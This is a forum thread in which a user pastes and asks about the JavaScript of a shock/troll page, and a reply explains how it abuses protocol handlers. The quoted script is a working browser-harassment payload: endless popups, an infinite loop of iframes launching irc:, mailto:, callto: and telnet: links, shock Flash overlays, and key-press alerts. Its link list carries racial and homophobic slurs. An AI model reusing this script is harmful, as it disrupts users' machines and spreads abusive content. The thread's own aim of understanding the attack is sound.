Jump to content

What Does This Do?


Guest FirefoxRocks
 Share

Recommended Posts

Guest FirefoxRocks

Since a forum was hacked, I got send an email with a link to a very dangerous website. Since it crashed my computer, I decided to investigate the JavaScript safely. I viewed the source through the W3C validator and this is what it came up with:Source URL: http://validator.w3.org/check?uri=http://r...Validator/1.654Actual Page URL: http://rules.on.nimp.org/WARNING! The JavaScript code below is very dangerous.

function altf4key() {if (event.keyCode == 18 || event.keyCode == 115)alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");}function ctrlkey() {if (event.keyCode == 17)alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");}function delkey() {if (event.keyCode == 46)alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the ######? That guy's ###### is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n");}var nom = navigator.appName.toLowerCase();var agt = navigator.userAgent.toLowerCase();var is_major = parseInt(navigator.appVersion);var is_minor = parseFloat(navigator.appVersion);var is_ie = (agt.indexOf("msie") != -1);var is_ie4up = (is_ie && (is_major >= 4));var is_nav = (nom.indexOf('netscape')!=-1);var is_nav4 = (is_nav && (is_major == 4));var is_mac = (agt.indexOf("mac")!=-1);var is_gecko = (agt.indexOf('gecko') != -1);// GECKO REVISIONvar is_rev = 0if (is_gecko) { temp = agt.split("rv:") is_rev = parseFloat(temp[1])}function procreate() { for(i = 0; i < 16; i++) { popUp("index.php?popup=1"); }}function popUp(URL) { day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");}goatseflash = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';goatseflash += ' <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">';goatseflash += ' <param name="movie" value="http://static.nimp.org/flash/hello.swf" />'goatseflash += ' <param name="wmode" value="transparent" />';goatseflash += ' </object>'goatseflash += '</div>';function load_goatse() { document.body.innerHTML += goatseflash; setTimeout("unload_goatse()", 3000); // 3s}function unload_goatse() { document.getElementById("hello").style.display = 'none';}var protos = [ "http://static.nimp.org/lm.pdf", "http://static.nimp.org/jews.wmv", "irc://irc.gnaa.us/gnaa", "irc://irc.efnet.org/politics", "news:alt.flame.niggers", "news:alt.flame.faggots", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "callto://JOIN_THE_GNAA__2005_RECRUITMENT_DRIVE", "aim:GoIM?screenname=Gary_Niger&message=HY+LOL+HY+LOL", "rlogin://1.1.1.1:80", "telnet://1.1.1.1:80", "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,heartiez2incog&groupname=gnaa", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/", ];function add(str) { div = document.getElementById('goatse'); div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';}function ruin() { document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>'; while (1) { for (i = 0; i < protos.length; i++) { add(protos[i]); } }}

This code can open Skype, Telnet, Windows Live Mail, Thunderbird (or any email clients) and endless amounts of popup windows. Even if Skype and Telnet aren't directly opened (Firefox and Chrome prompt you to "Launch application" like several million times), Windows Live Mail AND Thunderbird are opened. Since the CPU is dedicated to the browser and wlmail.exe/thunderbird.exe, Windows Task Manager is very slow to respond if you can manage to kill the browser and the email clients.I've also heard this can open IRC clients but I don't have any installed thank goodness. Also, AVG detected a virus when the page loaded.Now I see that alert boxes are created onkeypress with the first 3 functions, and some stuff is being written into the innerHTML of some stuff, but how does this JavaScript launch VoIP, email and IRC software?!

Link to comment
Share on other sites

It just calls the associated pseudo-protocols, e.g. irc: (IRC), mailto: (email), callto: (VoIP), telnet: (Telnet), etc. This isn't technically dangerous unless in your haste to close everything you click "send", then their spam is sent.

Link to comment
Share on other sites

Guest FirefoxRocks

Well actually it is dangerous because with VoIP, it automatically places a call somewhere. And it overloads the CPU because the browser opens many things repeatedly. With Firefox/Chrome, you can cancel "Launch application" (except for email). But with innerHTML, how does it automatically click the link?

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...